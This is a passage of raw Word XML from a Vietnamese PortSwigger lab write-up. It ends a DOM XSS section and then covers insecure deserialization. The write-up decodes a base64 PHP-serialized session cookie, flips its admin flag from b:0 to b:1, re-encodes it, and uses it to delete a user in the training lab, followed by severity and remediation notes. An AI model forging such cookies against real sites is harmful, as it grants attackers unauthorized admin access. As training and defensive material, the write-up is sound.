        <w:t xml:space="preserve"> Cần chặn các truy cập và thao tác có thể chèn vào trang web bằng cách thực hiện kiểm tra và lọc đầu vào một cách chặt chẽ. Đồng thời, cần giáo dục </w:t>
      </w:r>
      <w:r w:rsidRPr="002351AD">
        <w:lastRenderedPageBreak/>
        <w:t>người dùng về nguy cơ của XSS dựa trên DOM và khuyến khích họ sử dụng các biện pháp bảo vệ như sử dụng tiện ích chặn pop-up và kích hoạt chế độ cảnh báo trong trình duyệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036AA853" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc182429531"/>
      <w:bookmarkStart w:id="93" w:name="_Toc182909892"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF4517">
        <w:t>: Modifying serialized objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="6D64C076" w14:textId="12D00B45" w:rsidR="004F7CAE" w:rsidRDefault="004F7CAE" w:rsidP="00F67FB2">
      <w:hyperlink r:id="rId264" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74EADDE3" w14:textId="466E5C91" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="002351AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE" w:rsidRPr="004F7CAE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t>ồn tại lỗ hổng này liên quan đến việc chỉnh sửa cookie để thực hiện việc leo quyền truy cập và thực hiện các hành động có quyền hạn của người dùng khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F4CFD" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="002351AD" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A498C1C" w14:textId="265CF74A" w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="002351AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4C3E">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:t>ruy cập vào task và nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290CDF0" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00791BDB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53E3398E" wp14:editId="4F23DDEB">
            <wp:extent cx="6115050" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1307916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16097" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId265"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3028950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="483939C4" w14:textId="75BB0ED9" w:rsidR="00F67FB2" w:rsidRPr="0044729A" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="0044729A">
        <w:t xml:space="preserve">hực hiện đăng nhập với tài khoản là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wiener</w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="0044729A">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>peter</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="0044729A">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="0044729A">
        <w:t>Sau đó kiểm tra trang web thì thấy có được thông tin của cookie như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5669FC47" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0044729A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E055857" wp14:editId="1E1ABE86">
            <wp:extent cx="6115050" cy="1699895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2099001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01384" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId266"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1699895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B001519" w14:textId="517AEEBF" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0044729A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3629BD" w14:textId="2628BDCB" w:rsidR="00F67FB2" w:rsidRPr="004F7CAE" w:rsidRDefault="004F7CAE" w:rsidP="004F7CAE">
      <w:r w:rsidRPr="004F7CAE">
        <w:t>Thực hiện giải mã chuỗi trên, đ</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F7CAE">
        <w:t>ầu tiên với url-decode, kết quả thành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EC0056" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D5EACB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5846">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="030BE802" wp14:editId="7AD05995">
            <wp:extent cx="6115050" cy="4214495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2134771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71450" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId267"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4214495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D117C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="001D5846" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="001D5846">
        <w:t>Sau đó dùng chuỗi này để decode với base64 như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B4B489" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="001D5846">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2609A690" wp14:editId="5B47AF6A">
            <wp:extent cx="6115050" cy="4315460"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1396960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60967" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId268"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4315460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7EDA98" w14:textId="446FE27D" w:rsidR="00F67FB2" w:rsidRPr="004F7CAE" w:rsidRDefault="004F7CAE" w:rsidP="004F7CAE">
      <w:r w:rsidRPr="004F7CAE">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F7CAE">
        <w:t>ết quả là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56949F35" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="001D5846" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC919E" w14:textId="59AD4291" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>hực hiện leo quyền như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5B1A50" w14:textId="26CC4C25" w:rsidR="00F67FB2" w:rsidRPr="0044729A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0044729A">
        <w:t>Tham khảo solution của yêu cầu</w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve"> bài lab</w:t>
      </w:r>
      <w:r w:rsidRPr="0044729A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D4695" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044729A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68214BD3" wp14:editId="6066C115">
            <wp:extent cx="6115050" cy="3933825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="992587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87741" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId269"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3933825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17597B9A" w14:textId="0F434759" w:rsidR="00F67FB2" w:rsidRPr="001D5846" w:rsidRDefault="004F7CAE" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Lúc này </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="0044729A">
        <w:t>đã có kết quả của chuỗi cookie sau khi decode là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE782A2" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="0044729A" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728B69D3" w14:textId="12EEA4B3" w:rsidR="00F67FB2" w:rsidRPr="00820005" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="0044729A">
        <w:t xml:space="preserve">Đến đây </w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve">sẽ thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="0044729A">
        <w:t>chỉnh thông tin b:0 thành b:1</w:t>
      </w:r>
      <w:r>
        <w:t>, kết quả là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6967AFD9" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00820005">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D1FCC3" w14:textId="3B458217" w:rsidR="00F67FB2" w:rsidRDefault="004F7CAE" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F7CAE">
        <w:t>hực hiện encode với base64 với chuỗi trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA9205" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00820005" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00820005">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372080BD" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Kết quả là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7B1F7" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00820005" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00820005">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7352BB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00820005">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610A1DE4" wp14:editId="5C2996CF">
            <wp:extent cx="6115050" cy="4968240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="60516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6167" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId270"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4968240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39AF78" w14:textId="66DF939C" w:rsidR="00F67FB2" w:rsidRPr="004F7CAE" w:rsidRDefault="00F67FB2" w:rsidP="004F7CAE">
      <w:r w:rsidRPr="004F7CAE">
        <w:t>Tiếp tục, chuyển chuỗi sau khi encode vừa xong thành dạng url-encoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D58C6" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00820005">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="428B5B04" wp14:editId="772F7DCB">
            <wp:extent cx="6115050" cy="5126355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131750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0527" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId271"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="5126355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67137706" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Kết quả là chuỗi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CA0BE0" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="006F448C" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F448C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30%3D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12368365" w14:textId="06F371F8" w:rsidR="00F67FB2" w:rsidRPr="006F448C" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="006F448C">
        <w:t>hay chuỗi này vào giá trị của phần session và load lại trang web thì kết quả như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B6646" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00820005">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73F9D0AD" wp14:editId="51C76778">
            <wp:extent cx="6115050" cy="1977390"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="854801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01064" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId272"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1977390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F6830" w14:textId="7069280E" w:rsidR="00F67FB2" w:rsidRPr="00820005" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00820005">
        <w:t xml:space="preserve">Đến đây </w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve">đã </w:t>
      </w:r>
      <w:r w:rsidRPr="00820005">
        <w:t xml:space="preserve">xóa </w:t>
      </w:r>
      <w:r w:rsidR="004F7CAE">
        <w:t xml:space="preserve">được </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7CAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="00820005">
        <w:t xml:space="preserve"> như yêu cầu đề bài và hoàn thành thử thách của bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FCF4B3" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00B050BE" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00820005">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D952B7" wp14:editId="51471471">
            <wp:extent cx="6115050" cy="2463165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="593036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36441" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId273"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2463165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="244422CA" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="007C6498" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="007C6498">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mức độ ảnh hưởng của lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6498">
        <w:t>High (cao) vì nó cho phép kẻ tấn công thực hiện leo quyền truy cập và thực hiện các hành động có quyền hạn của người dùng khác một cách không ủy quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F755DB" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="007C6498" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C6498">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA58E6B" w14:textId="281E5201" w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lọc các cookie đầu vào:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4C3E">
        <w:t xml:space="preserve"> Thực hiện kiểm tra và lọc các giá trị của cookie từ người dùng để loại bỏ các dấu hiệu của chỉnh sửa không ủy quyền trước khi xử lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D55933D" w14:textId="62B83F1D" w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E" w:rsidRDefault="00F67FB2" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sử dụng session identifiers an toàn:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4C3E">
        <w:t xml:space="preserve"> Sử dụng các session identifiers an toàn và không thể dự đoán để ngăn chặn việc chỉnh sửa cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0339FEF1" w14:textId="5ECEAC71" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
